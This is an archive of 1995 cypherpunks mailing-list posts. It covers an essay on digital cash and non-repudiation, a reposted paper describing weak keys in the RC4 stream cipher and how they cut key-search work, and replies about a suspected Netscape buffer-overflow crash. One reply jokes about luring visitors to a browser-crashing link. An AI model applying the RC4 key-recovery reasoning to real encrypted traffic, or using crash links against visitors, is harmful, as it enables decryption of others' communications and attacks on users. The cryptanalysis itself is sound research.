From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 22 Sep 95 06:23:41 PDT
To: cypherpunks@toad.com
Subject: e$: Non-Repudiation
Message-ID: <v02120d00ac8339d1a3bb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Dr. May said:

>the
>"ontology" of digital money, the instruments and forms it can take, are
>_impoverished_ compared to the real world.

Ah... Someone's playing my song...

Sorry I took so long, but I wanted to give this excellent post some serious
attention, which is hard to come by when you're a person like me (praise
the lord and pass the Ritalin ;-) ).

>In my eight years of following digital cash work, I've been struck with how
>little _economics_ enters the fray.

I think you're right, Tim.  More and more people are finally realizing that
digital commerce *is* cryptography: cryptography as it's applied to
economics on a network of microprocessors.  After all, Netscape plans to
make its money on servers, most important, its commerce servers, the
servers that require the most cryptography.

A major leader on this front, to my mind -- that is, someone who has been
barking on the end of his chain ;-) the longest and loudest about all this,
and who has gone out and *learned* how the clearing of transactions happens
in the capital markets and elsewhere -- is Eric Hughes. Eric, who, along
with Tim May, founded this group to begin with, who has worked with David
Chaum, and who designed and built the first anonymous remailers.  One of
the reasons we don't see much of Eric around here these days is because
he's out there putting some rubber to the road in his consulting business,
where he's focusing on the very issue of cryptography and its applications
to digital commerce, and I wish him well.

That is *not* to slight others in this group who are also thinking about
this stuff. Not at all. In addition, most of us are looking at other issues
in cryptography, like remailers, like keeping the state out of our face,
like pithing SSL, and, frankly, most of the rest of us are too busy making
a living to do anything but lurk here.  Cryptography is huge, and digital
commerce is a small conceptual subset of the whole field, no matter how
important some of us think it is.

Nonetheless, the fact that both of the founders of this group are focusing
on cryptographic financial objects and/or their network infrastructure
speaks volumes its importance anyway.

Having laid down that as covering fire ;-), let's talk about creating an
ecosystem of autonomous financial objects on public networks, and why I
think that Tim's post is particularly important.

The reason we have the multiplicity of financial instruments out there to
begin with is because there is money in creating them.  But the reason
there's money in it is because of the fall of the price of networked
computer-based communication.  The market they're traded in exists in
computers.  The decisions made to buy and sell them are at least
facilitated by computers. The clearing and settlement of these instruments
are done on computers.  However, these systems are all centralized, closed,
private systems.  For that reason, the very accelleration of processing
cost-effectiveness which created them is going to sweep them away someday.

The bleeding edge of all this is the so-called 'synthetic' security,
something which exists as a software manifestation of the most recent
financial theory, sometimes only experimental and a few hours old,
sometimes sold to an investment bank's clients just like any other
security, secondary markets and all. A combination of purchases and short
sales of put and call options on a particular bond, which behaves like the
bond in price, for example, without having to hold the bond itself. This is
usually done because the liquidity or the transaction cost of holding these
instruments is lower than that of the bond.  In addition, since unwinding
of the synthetic security should yield the price of the bond after
transaction costs, any discrepancies between the two yields an opportunity
for arbitrage.

Of course, in the early days, all of 10 years ago, theory held somewhat
more promise than reality. The great "portfolio insurance" fiasco of the
early 80's arose from the fact that the options trades which were supposed
to offset the fall of the price of a security in this fashion turned out to
be not very liquid after all. When the time came to unwind these positions
in a hurry, they got stuck. That's not as much of a problem these days, as
evidenced by the proliferation of increasingly sophisticated securities
based on the same idea, which trade and settle just fine,

Note that we're talking about book-entry entities here.  That is, these
modern securities are creatures of an environment where software
"applications" reside on a particular computer on a particular local or
private network, to manipulate centralized accounting entries on that
computer or elsewhere, in order to reflect the expected or traded value of
a security. Things that live "on" a computer. It's controlled completely
from the outside, with the exception of the behavior of the market. Not
"in" it, or "in" the network the computer's hooked into.

Notice how different all that is from a digital certificate like Chaumian
digital cash. When you get a digital certificate, you receive it through a
cryptographic protocol which ensures that it is what it says it is.  If the
certificate is traded on-line, then the certificate's issuer vouches for it
right then and there. If it is traded off-line (someday, I hope...) the
certificate speaks for itself, just like a dollar bill's supposed to.  As
such, it can reside anywhere, not as a book-entry "on" a central computer
somewhere, but "in" the network.

Notice also we are backing down a level of abstraction from the status quo.
A certificate is what it says it is, it is not book-entry, which is a
pointer to something which is what it says it is.

That's the paradox of modern book entry systems. A book entry used to just
"point" to a physical certificate, which in turn points to a cash-flow or a
series of cash-flows of some kind. Of course, the term "book entry" is
almost exclusively used to describe clearing capital market trades without
the physical exchange of certificates for other pieces of paper (receipts,
checks, signature guarantees, etc.). The institutional ideal in this
environment is a clearing-house wire clearing the trade in exchange for a
bank wire transfer settling the trade. The book entry becomes the primary
abstraction, not any certificate it is supposed to represent.

The problem with book entries, of course, is the problem with any database.
You have to manipulate that database, and to do that, you have to get
access, and to do that you need permission... you get the point.  In a
capital market, that costs money, and it's costing more and more as a
percentage of the revenue derived from the transaction, because to get
access, you need human permission and intervention. If a human isn't
supervising things, people take advantage of their access. Mr. Leeson of
Barings was a classic case in point. Meanwhile, Moore's law keeps lowering
the cost of the rest of the production cycle.

Another problem, closer to the heart of this list, is that of anonymity.
The ultimate authority to modify that particular line item or database
field derives from the "owner" of that entry, since it is usually modified
by someone else, "a chain of custody" is needed: audit trails, and of
course, True Names are necessary somewhere, even with numbered accounts.
The primary point for inventing double-entry bookeeping was so owners could
control accountants, after all.

When electronic book entries started replacing paper ones, the resulting
economies of scale caused great centralization to occur. As I've said here
before, lines were cheaper than nodes, and things got bigger and bigger.
The advent of the microprocessor has been continually eating away at these
large control hierarchies, and making them harder and harder to maintain.
Things are getting out of control again.

In an out of control environment, like that found on public uncontrolled
networks like the internet, software has to be autonomous. A certificate,
like a piece of digital cash, is an autonomous entity. As we said before,
it is what it says it is. Because of a cryptographic protocol, you trust
the thing because of the way it behaves, not because you trust the people
who gave you access to it.

Now, Tim is talking about another type of autonomous entity, an agent,
basically, a "friendly" virus. A piece of code which is launched or
launches itself on one machine, crosses a network, runs itself on another
machine, and returns with a result. Our current concept of software agents
implies that there's something on another machine needs to be "got",
usually a database requiring access and permissions, which is why people
who manage centralized repositories of information are nervous about them,
just like microcomputers made their mainframe predecessors nervous.

On the other hand, it's easy to see a scenario where two agents arrange to
meet somewhere on a *public* network, in the presence of another
"impartial" agent to exchange certificates, trading, settling and clearing
all in one shot. Unsupervised. Out of control. Because the agents are
engaging in a cryptographic process which "breaks" if the entities behave
improperly, fraud is supposed to be prevented.

Which brings me to something which goes right to the heart of one of our
most cherished ideas here on cypherpunks, the idea of crypto-anarchy: with
the right cryptography, agreements become uninforceable because perfect
anonymity disconnects the "pointers" between digital and physical identity.
Crypto-anarchy means that states don't know who to force to do what.
Technology does this, it's reality, it's not optional, so we better get
used to it. The catch to all of this is a curious conceptual double
negative called non-repudiation.

I had trouble remembering the name for a while, I kept wanting to say
"plausible deniability", in the spirit of Admiral Poindexter. But I've had
to remember the real name, because the idea's so damned important.

Right now, the canon of commercial law for the entire free world (just so I
can't be accused of quibbling here :-) ) is completely based on the concept
of non-repudiation, that is, you can't repudiate an agreement, or a trade,
or you or you face legal sanction. Force, in other words. Ultimately, the
state can send you to jail, or worse.

About a year ago, when www-buyinfo had active discussion on it, (and had
not yet been turned into cyphe$rpunks by my reflexive redirection there of
all the e$ cheezy-bits from cypherpunks ;-), ) I got into an interesting
discussion there about non-repudiation and I didn't even know I was
involved in one. We were arguing about a familiar dichotomy in the concept
of digital cash, the difference between on-line and off-line protocols.

I was arguing that on-line cash was better because it was a more
"peer-to-peer" proposition than an online system, which required access to
a network connection, and high-bandwidth processing at the certificate
issuer so the issuer could participate in *every* *single* *cash*
*settlement*.  That invasive participation struck me as antithetical to the
whole concept of a hyper-distributed geodesic economy that I thought that
digital commerce was going to become. The technology which made it possible
for anyone, anywhere, to sell anything digitable -- music, movies,
information, teleoperator control sequences, professional services, and
financial instruments -- to anyone else, while using the cheapest possible
transaction protocol, that is, cash, a protocol which immediately and
finally clears and settles a transaction,  will win out in the end.

So, I was finding myself twisting in the wind about all of this, trying to
figure out how offline cash was going to have to work if double-spending
was possible, how could be kept to managable levels. I found myself saying
things like (forgive me), "Well, if they double-spend, put 'em in the
airlo- er, throw 'em in jail!". In other words, we have the key of the
double spender, even if she's anonymous, so we could use snitches,
subpoenas of bank records, and plain old detective work, to send her to
jail should she repudiate the agreement to not double-spend.

It's hard to see how that would happen in a perfect world with perfect
anonymity, much less in a world where nation-states couldn't collect income
to pay for judges, courts, and LEAs. Nick Szabo was gleefully slapping me
around the head and shoulders about this, and I retired from the field. So,
no matter how much the idea refuses to leave my thick Frisian head, I'll
leave that big, red, dog ("Hey, baby...") sleeping on the front porch for
the time being. This without even *touching* the other problem with digital
cash in general, Nathaniel Borenstein's favorite anti-digital-cash 2-by-4
-- which threatens *all* digital cash systems on- or off- line -- the
prospect of someone *inside* a certificate issuer stealing the private key
for an entire issue, and printing all the money she wants. To that I say,
use multiple issues, and distribute keys, but I see that big red dog's
waking up, so we'll move on...

So, you can see we're talking about the alleged inability of cryptography
to deal with the repudiation of digital cash trades. It cannot currently
keep transactions either the way cypherpunks want, utterly anonymous, and
the way I want them, off-line.

In fact, at the moment, I'm very close to holding the strong form of this
argument, that is, the concept of non-repudiation is the *only* reason
we're being forced into true-name trades right now. It's not the long arm
of the law, it's the market, which makes sense. If it was just a legal
obstacle, and really contrary to market forces, it should have collapsed
under a barrage regulatory arbitrage attempts. No threat of legal force
would have prevented people from trying to make money issuing digital cash.
The War on Some Drugs is a good example of this.

If we could get digital cash trades, or trades of any kind of financial
instrument for that matter, to trade on public networks without the ability
to repudiate them, it probably won't matter whether they're illegal, which
is interesting, to say the least, but it's no different from what happens
with paper certificates.

Now, as usual, all this is no brilliant insight on my part. A few days ago,
I didn't know what "non-repudiation" meant.

On Wednesday, I had a very interesting over-coffee conversation with Yet
Another Professional Who Wants To Remain Anonymous. I must be a magnet to
these people for some reason, at least until they figure out I'm not *that*
useful. Or maybe because it's because I need so much help. Anyway, people
who were on cypherpunks last summer remember my previous anonymous legal
informant, the esteemed councellor Vinnie "The Pro" Bono, not to be
confused with his second cousin, the Honorable Sonny. "Vinnie" wanted to
remain anonymous because he was afraid of being deluged with requests for
free legal advice, among other things. I still won't tell you who he was,
but he has since "come out", and, of course, we *aren't* choking his POP
server with requests to get our various relations out of the slammer, or
anything else for that matter, even though he talks freely here under his
True Name.

I expect my new friend will figure this out soon enough. The other reason
he gave is that he's so damn busy he doesn't have time to do much but lurk.

Unfortunately, this guy lurks not here, but on www-buyinfo, having signed
on to cypherpunks and deciding *not* to drink from a firehose, thank you
very much, and since I've been spamming it lately with the aforementioned
cypherpunks e$ cheezy bits, he seems to prefer it there. I have to admit
myself that as much as *I* like it here, it is an acquired taste...

Now, our friend Vinnie has very some serious credentials, but this new guy
is just plain scary because he's so focused on the commercial law of EDI
and electronic commerce. This hypercredentialed gentleman shows up on the
program committee of various "suit" conferences on electronic commerce,
sponsored by various international legal entities and TLAs, and seems to be
up to his elbows in the Current Fantasy according to the Powers that Be, in
particular, its legal armature: legal sanction, non-repudiation, True
Names, and all.

Which leads me to *his* moniker. I thought I was going to be civil about
this, and just refer to him in the third person singular, but I had this
amazing brainstorm. Remember the comedian "Professor" Edwin Corey, who died
recently? His schtick was a variant on the nutty professor, obfiscatory
language, lab coat, Converse high-tops and all, and he called himself the
"The World's Foremost Authority". Didn't say on what, which was the point.
As a philosophy major at Mizzou who really loved his informal fallacies,
one of which was the Appeal to Authority, this particular example always
made me laugh. So, I've dubbed this particular informant "Edwin Corey", or
"Mr. Corey" in true Oxfordian fashion, not to be at all uncharitable, but
because, in truth, this guy is probably the world's foremost authority on
this stuff, if anyone is...

He's going to give me pointers to some of this proposed "legal armature"
from time to time, the first of which is a report by one Michael Baum
entitled, deep breath, "Federal Certification Authority Liability and
Policy: Law and Policy of Certificate-Based Public Key and Digital
Signatures".  This 500+ page monster can be obtained from, who else, The
Feds, in particular, another big breath, the United States Department of
Commerce, Technology Administration, National Technical Information
Service, Springfield, VA, 22161; (703) 487-4650. The cost is $61, plus $6
for shipping and handling, plus $2 for orders sent outside the U.S., Canada
or Mexico, plus rush charges if you call 1-800-553-NTIS, and if you *don't*
jump up and down three times *before* you write the check or read them your
credit card over the phone, the trade will be repudiated. ;-).

Oh. It says something here about being able to get it through a web-site
called FedWorld, http://www.fedworld.gov .

So, it's very important to work on financial objects and agents.  However,
I should really try to concentrate on the issue of non-repudiation, because
it is  a necessary, and maybe (strong form) necessary and sufficient,
criteria for the development of digital commerce on public networks.

Cheers,
Bob Hettinga



















-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 09:30:49 PDT
To: cypherpunks@toad.com
Subject: Reformatted Weak Keys in RC4 for readability.
Message-ID: <9509221627.AA19355@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


I modified only the formatting to get rid of the wrap...I did it so that I
could enjoy reading it and I send it in to y'all so you won't have to do
it as well...it's a wonderful paper.

Patrick
                  A CLASS OF WEAK KEYS IN THE RC4 STREAM CIPHER

                                PRELIMINARY DRAFT

                                   ANDREW ROOS
                          VIRONIX SOFTWARE LABORATORIES


1.  INTRODUCTION

This paper discusses a class of weak keys in RSA's RC4 stream cipher. It shows
that for at least 1 out of every 256 possible keys the initial byte of the
pseudo-random stream generated by RC4 is strongly correlated with only a few
bytes of the key, which effecitively reduces the work required to exhaustively
search RC4 key spaces.


2.  STATE TABLE INITIALIZATION IN RC4

Although the RC4 algorithm has not been published by RSA Data Security, source
code to implement the algorithm was anonymously posted to the Cypherpunks   
mailing list several months ago. The success of the Cypherpunks' brute-force
attack on SSL with a 40-bit key indicates that the source code published did
accurately implement RC4.

RC4 uses a variable length key from 1 to 256 bytes to initialize a 256-byte
state table which is used for the subsequent generation of pseudo-random bytes.
The state table is first initialized to the sequence {0,1,2,...,255}.   
Then:

1    index1 = 0;
2    index2 = 0;
3
4    for(counter = 0; counter < 256; counter++)
5    {
6        index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;   
7        swap_byte(&state[counter], &state[index2]);
8        index1 = (index1 + 1) % key_data_len;
9    }

Note that the only line which directly affects the state table is line 7, when
two bytes in the table are exchanged. The first byte is indexed by "counter",
which is incremented for each iteration of the loop. The second byte is
indexed by "index2" which is a function of the key. Hence each element of the
state table will be swapped at least once (although possibly with itself),
when it is indexed by "counter". It may also be swapped zero, one or more   
times when it is indexed by "index2". If we assume for the moment that
"index2" is a uniformly distributed pseudo-random number, then the probability
that a particular single element of the state table will be indexed by
"index2" at some time during the initialization routine is:

     P = 1 - (255/256) ^ 255
       = 0.631

(The exponent is 255 because we can disregard the case when "index2" and
"counter" both index the same element, since this will not affect its value.)

Conversely, there is a 37% probability that a particular element will _not_ be
indexed by "index2" during initialization, so its final value in the state
table will only be affected by a single swap, when it is indexed by "counter".
Since key bytes are used sequentially (starting again at the beginning when the
key is exhausted), this implies:

A.   Given a key length of K bytes, and E < K, there is a 37% probability that
     element E of the state table depends only on elements 0..E (inclusive) of
     the key.

(This is approximate since "index2" is unlikely to be uniformly   
distributed.)

In order to make use of this, we need to determine the most likely values for
elements of the state table. Since each element is swapped at least once (when
it is indexed by "counter"), it is necessary to take into account the likely
effect of this swap. Swapping is a nasty non-linear process which is hard to
analyze. However, when dealing with the first few elements of the state table,
there is a high probability that the byte with which the element is swapped
has not itself been involved in any previous exchanges, and therefore retains
its initial value {0,1,2,...,255}. Similarly, when dealing with the first few
elements of the state table, there is also a significant probability that none
of the state elements added to index2 in line 6 of the algorithm has been   
swapped either.

This means that the most likely value of an element in the state table can be
estimated by assuming that state[x] == x in the algorithm above. In this case,
the algorithm becomes:

1    index1 = 0;
2    index2 = 0;
3
4    for(counter = 0; counter < 256; counter++)
5    {
6        index2 = (key_data_ptr[index1] + counter + index2) % 256;   
7        state[counter] = index2;
8        index1 = (index1 + 1) % key_data_len;
9    }

Which can be reduced to:

B.   The most likely value for element E of the state table is:

     S[E] = X(E) + E(E+1)/2
     where X(E) is the sum of bytes 0..E (inclusive) of the key.

(when calculating the sum of key elements, the key is considered to "wrap   
around" on itself).

Given this analysis, we can calculate the probability for each element of the
state table that it's value is the "most likely value" of B above. The easiest
way to do this is to evaluate the state tables produced from a number of
pseudo-randomly generated RC4 keys. The following table shows the results for
the first 47 elements from a trial of 100 000 eighty-bit RC4 keys:

          Probability (%)

0-7       37.0  36.8  36.2  35.8  34.9  34.0  33.0  32.2
8-15      30.9  29.8  28.5  27.5  26.0  24.5  22.9  21.6
16-23     20.3  18.9  17.3  16.1  14.7  13.5  12.4  11.2
24-31     10.1   9.0   8.2   7.4   6.4   5.7   5.1   4.4
32-39      3.9   3.5   3.0   2.6   2.3   2.0   1.7   1.4
40-47      1.3   1.2   1.0   0.9   0.8   0.7   0.6   0.6

The table confirms that there is a significant correlation between the first
few values in the state table and the "likely value" predicted by B.


3.  WEAK KEYS

The RC4 state table is used to generate a pseudo-random stream which is XORed
with the plaintext to give the ciphertext. The algorithm used to generate the
stream is as follows:

     x and y are initialized to 0.

     To generate each byte:

1    x = (x + 1) % 256;
2    y = (state[x] + y) % 256;
3    swap_byte(&state[x], &state[y]);   
4    xorIndex = (state[x] + state[y]) % 256;   
5    GeneratedByte = state[xorIndex];

One way to exploit our analysis of the state table is to find circumstances
under which one or more generated bytes are strongly correlated with a small
subset of the key bytes.

Consider what happens when generating the first byte if state[1] == 1.

1    x = (0 + 1) % 256;                  /* x == 1 */
2    y = (state[1] + 0) % 256;           /* y == 1 */
3    swap_byte(&state[1], &state[1]);    /* no effect */
4    xorIndex = (state[1] + state[1]);   /* xorIndex = 2 */
5    GeneratedByte = state[2]

And we know that state[2] is has a high probability of being

     S[2] = K[0] + K[1] + K[2] + 2 (2+1) / 2

Similarly,

     S[1] = K[0] + K[1] + 1 (1+1) / 2

So to make it probable that S[1] == 1, we have:

     K[0] + K[1] == 0 (mod 256)

In which case the most likely value for S[2] is:

     S[2] = K[2] + 3

This allows us to identify a class of weak keys:

C.   Given an RC4 key K[0]..K[N] with K[0] + K[1] == 0 (mod 256), there is a
     significant probability that the first byte generated by RC4 will be   

     K[2] + 3 (mod 256).

Note that there are two special cases, caused by "unexpected" swapping during
key generation. When K[0]==1, the "expected" output byte is k[2] + 2, and when
k[0]==2, the expected value is k[2] + 1.

There are a number of similar classes of "weak keys" which only affect a few
keys out of every 65536. However the particular symmetry in this class means
that it affects one key in 256, making it the most interesting instance.

Once again I took the easy way out and used simulation to determine the
approximate probability that result C holds for any given key. Probabilities
ranged between 12% and 16% depending on the values of K[0] and K[1], with a
mean of about 13.8%. All these figures are significantly greater than the   
0.39% which would be expected from an uncorrelated generator. The key length
used was again 80 bits. This works the other way around as well: given the
first byte B[0] generated by a weak key, the probability that K[2]==B[0]-3
(mod 256) is 13.8%.

       

4.  EXPLOITING WEAK KEYS IN RC4

Having found a class of weak keys, we need a practical way to attack RC4 based
cryptosystems using them. The most obvious way would be to search potential
weak keys first during an exhaustive attack. However since only one in every
256 keys is weak, the effective reduction in search space is not particularly
significant.

The usefulness of weak keys does increase if the opponent is satisfied with
recovering only a percentage of the keys subjected to analysis. Given a known
generator output which includes the first generated byte, one could assume
that the key was weak and search only the weak keys which would generate the
known initial byte. Since 1 in 256 keys is weak, and there is a 13.8% chance
that the assumed value of K[2] will be correct, there is only a 0.054% chance
of finding the key this way. However, you have reduced the search space by 16
bits due to the assumed relationship between K[0] and K[1] and the assumed
value of K[2], so the work factor per key recovered is reduced by a factor of
35, which is equivalent reducing the effective key length by 5.1 bits.

However in particular circumstances, the known relationships between weak keys
may provide a much more significant reduction in workload. The remainder of
this section describes an attack which, although requiring very specific
conditions, illustrates the potential threat.

As a stream cipher, a particular RC4 key can only be used once. When multiple
communications sessions are required, some mechanism must be provided for   
generating a new session key each time. Let us suppose that an implementation
chose the simple method of incrementing the previous session key to get the
new session key, and that the session key was treated as a "little endian"
(least significant byte first) integer for this purpose.

We now have the interesting situation that the session keys will "cycle
through" weak keys in a pattern which repeats every 2^16 keys:

00 00 00 ...    Weak
(510 non-weak keys)
FF 01 00 ...    Weak
(254 non-weak keys)
FE 02 00 ...    Weak
(254 non-weak keys)
FD 03 00 ...    Weak
...
01 FF 00 ...    Weak
(254 non-weak keys)
00 00 01 ...    Weak
(510 non-weak keys)
FF 01 01 ...    Weak

(Least significant byte on the left)

Now while an isolated weak key cannot be identified simply from a known
generator output, this cycle of weak keys at known intervals can be identified
using statistical techniques since each of the weak keys has a higher than
expected probability of generating the _same_ initial byte. This means that an
opponent who knew the initial generated bytes of about 2^16 session keys could
identify the weak keys, and would also be able to locate the 510-key gap
between successive cycles of weak keys (although not precisely). Since the
510-key gap occurs immediately following a key which begins with 00 00, the
opponent not only knows that the keys are weak, but also knows the first two
bytes of each key. The third byte of each key can be guessed from the first
output byte generated by the key, with a 13.8% chance of a correct guess.   

Assuming that the "510-key gap" is narrowed down to 1 of 8 weak keys, the   
attacker can search a key space which is 24 bits less than the size of the
session keys, with a 13.8%/8 chance of success, effectively reducing the key
space by approximately 18 bits.

Although this particular attack depends on a very specific set of
circumstances, it is likely that other RC4 based cryptosystems in which there
are linear relationships between successive session keys could be vulnerable
to similar attacks.


5.  RECOMMENDATIONS

The attacks described in this algorithm result from inadequate "mixing" of key
bytes during the generation of the RC4 state table. The following measures
could be taken to strengthen cryptosystems based on the RC4 algorithm:

(a) After initializing the algorithm, generate and discard a number of   
bytes.
    Since the algorithm used to generate bytes also introduces additional   

    non-linear dependencies into the state table, this would make analysis
    more difficult.

(b) In systems which require multiple session keys, ensure that session keys
    are not linearly related to each other.

(c) Avoid using the weak keys described.


6.  CONCLUSION

This preliminary analysis of RC4 shows that the algorithm is vulnerable to
analytic attacks based on statistical analysis of its state table. It is
likely that a more detailed analysis of the algorithm will reveal more
effective ways to exploit the weaknesses described.



Andrew Roos <andrewr@vironix.co.za>
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 02:29:06 PDT
To: cypherpunks@toad.com
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <43tvj4$t7v@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509220836.EAA14476@clark.net>, rjc@clark.net (Ray Cromwell) writes:
> Disregard that last message. Those drugs I was taking must have just kicked
> in. I was running another program in the background which coincidentally
> brought up an xterm at the same time I clicked on the link. Damn,
> and I thought I had found another bug. Ah well. There's probably one lurking
> there somewhere. It was good while it lasted. When I hit "send" and
> that xterm popped up, I almost jumped out of my seat. ;-) Remember
> this lesson, you should always try to repeat your bugs atleast three
> times. ;-)

  Thanks for quickly posting this retraction.  For the record, netscape
talks SMTP directly, and does not run an external program to send mail.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Halvor Kise jr." <halvork@frodo.hiof.no>
Date: Fri, 22 Sep 95 00:20:14 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <Pine.LNX.3.91.950922092643.8228B-100000@frodo.hiof.no>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 22 Sep 1995, Ray Cromwell wrote:
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:

Yes! Nice! At last I can include a big Netrape icon on my homepage.
Maybye with the text "Netscape users, click here.."
All the link does is to crash netscape...
At last!  Thanks Ray!
:-)

- - Halvor.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.0

iQCVAwUBMGJlamzoaW8/SAL5AQGGigP/Q0K5tT8pAxNp7xigYP3r8WB6oxQXa7n1
G6L9umkfIBhPeZ9hFhCmSNvZLds31qoczl9QW2u+kSV10QYBuDsTlW56R9Hjh6PM
/U5h6Ig9eD3jcf74388YEw4iUyKT+kNbcYSiCCvcK22MdA3T8W5ZXpg7f9ODaLSk
uVZBl+pEA3Q=
=HBzy
-----END PGP SIGNATURE-----
 
--
                          *** MEMENTO MORI ***

                PGP-key by fingering halvork@frodo.hiof.no
                       http://www.hiof.no/~halvork/

            * Support The Phil Zimmermann legal defense fund *
                      http://www.netresponse.com/zldf





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dhenson@itsnet.com (Don Henson)
Date: Fri, 22 Sep 95 08:42:57 PDT
To: cypherpunks@toad.com
Subject: Munition (RSA/Perl) T-shirts Now Shipping From Stock!
Message-ID: <199509221557.JAA23019@scratchy.itsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


By now, everyone knows about the TSHIRT that has been classified as a 
MUNITION by the US Goverment. If you don't know, just send email to 
wepinsto@colossus.net with a subject of 'TSHIRT STORY' and you will 
receive full details via return email.

We have thus far shipped over 850 of the RSA/Perl Munition T-shirts and 
are now in a position to ship most orders from stock. You no longer 
have to pay your money and wait for months to get your t-shirt while 
someone else collects interest on YOUR money. We (WEPIN Store) can ship 
your t-shirt within two weeks of receiving your order. Orders are still 
pouring in. Don't be left out. Order your's today. (Read some comments 
of our customers at the end of this post.)

For more information on how to own this classic example of civil 
disobedience, just send email to wepinsto@colossus.net with the subject 
of 'SHIRT'. (You don't have to be a US/Canadian citizen to request the 
info.) Or, if you have WWW access, just point your Web browser to:

     http://colossus.net/wepinsto/wshome.html

By the way, 25% of the profits from the sale of the tshirt (in the 
US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help 
defend the author of PGP from harassment and possible prosecution by 
the Fedgoons.

And if you get arrested for wearing the Munitions Tshirt, we'll refund 
your purchase price.  :-)

                          ====++++====++++

Here are some testimonials from a few of our many satisfied customers:

"Got mine this afternoon.  Wooohhaah!!  Already had some folks at
Blockbusters point, mumble to themselves, and then ask me what the
munitions warning meant.  This is going to be fun!!  I'm a cyphernerd
for sure..."

"Thanks for the great T-shirt.  I'm making copies of your paper order 
form for others."

"I think I'll have to wear the shirt over to Logan Airport and hang 
around the International Arrivals terminal a few times.   <G>"

"I received the T-shirt on 8/3.  Thank you, it has been a pleasure 
dealing with you!"

"The first thing that I did after it arrived was to don it and then go
visit the office of one of our visiting researchers from Russia.  :)~"

                          ====++++====++++

Get your Munitions Tshirt now. Who knows how long they'll stay in 
production!

Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
email: wepinsto@colossus.net
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herbs@interlog.com (Herb Sutter)
Date: Fri, 22 Sep 95 06:41:58 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <199509221341.JAA07664@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:33 1995.09.22 GMT, Jeff Weinstein wrote:
>In article <199509220612.CAA11441@clark.net>, rjc@clark.net (Ray Cromwell)
writes:
>> I've found a Netscape bug which I suspect is a buffer overflow and
>> may have the potential for serious damage. If it is an overflow bug,
>> then it may be possible to infect every computer which accesses a web
>> page with Netscape. To see the bug, create an html file containing
>> the following:
>
>  Thanks for the report.  I will make sure that this is fixed.
>
>	--Jeff

Don't just look at this bug, though... check ALL your static buffers and
include code to check for overflow writes.  For example, if Netscape is
written in C or C++ and the above code uses strcpy(), you could change
strcpy() to strncpy() everywhere (and then set the last char to null in case
strncpy() didn't).  Your programmers will know what I mean.

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Fri, 22 Sep 95 07:06:55 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: Netscape closes up 1 3/8 today!
In-Reply-To: <199509211846.LAA04164@orac.engr.sgi.com>
Message-ID: <9509221401.AA26983@outland>
MIME-Version: 1.0
Content-Type: text/plain



	I've been lurking for a week or two, but I wanted to say
something about this:

> I think it probably has more to do with the fact that the name
> "Netscape" has been on the front page of every major newspaper in the
> US.  I guess bad press is better than no press at all.  And the press
> hasn't even been that bad.

	And you have to take into account that a good chunk of the
population has no clue about how either encryption (well, basic math
for a good chunk :/ )  or software works.  Just heard something on the
radio (Niel Bortz, if you're curious) about how California public 
schools have started giving credit for wrong answers on MATH tests.
So the students don't _feel bad_ about being wrong.  I want to trust 
my life to an airplane designed by someone who got the right answers,
not to someone who has artificially induced high self-esteem. 

	The casual Joe Sixpack at most may now that if Microsloth 
Doesn'tWorks has a problem he goes out 9 months later and shells out 
more $$$ for the next buggy release. Start mentioning 128-bit IDEA, 
entropy, or pseudo-anything and their eyes may just glaze over.  With
the state of public education, it'll be amazing if Joe Sixpack can 
figure out that he has to plug in his computer first; nevermind 
understand why trusting his financial secrets to a secret "proprietary"
